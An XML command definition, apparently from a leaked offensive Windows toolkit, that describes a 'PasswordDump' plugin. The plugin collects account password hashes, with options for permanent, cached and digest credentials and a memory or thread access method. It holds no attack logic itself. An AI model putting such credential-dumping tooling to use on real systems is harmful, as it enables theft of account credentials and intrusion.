shadowbrokers-exploits/windows/Resources/Dsz/Commands/CommandLine/PasswordDump_Command.xml
2017-04-14 11:45:07 +02:00

41 lines
1.4 KiB
XML

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Plugin providerName='Tasking/Mcl_Cmd_PasswordDump_Tasking.pyo' providerType='script'>
<Command name="PasswordDump" id="0">
<Help>This function collects the user account and password hash information.</Help>
<Input>
<Option name='all' optional='true' group='passtype'>
<Set data='type' value='0'/>
<Help>Get both permanent and cached passwords (default)</Help>
</Option>
<Option name='permanent' optional='true' group='passtype'>
<Set data='type' value='1'/>
<Help>Get only permanent passwords</Help>
</Option>
<Option name='cached' optional='true' group='passtype'>
<Set data='type' value='2'/>
<Help>Get only cached passwords</Help>
</Option>
<Option name='digest' optional='true' group='passtype'>
<Set data='type' value='3'/>
<Help>Get only cached passwords</Help>
</Option>
<Option name='method' optional='true'>
<Help>Specifies memory access and thread method - will use current default if not specified.</Help>
<Argument name='memory' data='memory'/>
<Argument name='thread' data='thread'/>
</Option>
</Input>
<Output>
<Data name='type' type='uint8_t' default='0'/>
<Data name='memory' type='string'/>
<Data name='thread' type='string'/>
</Output>
</Command>
</Plugin>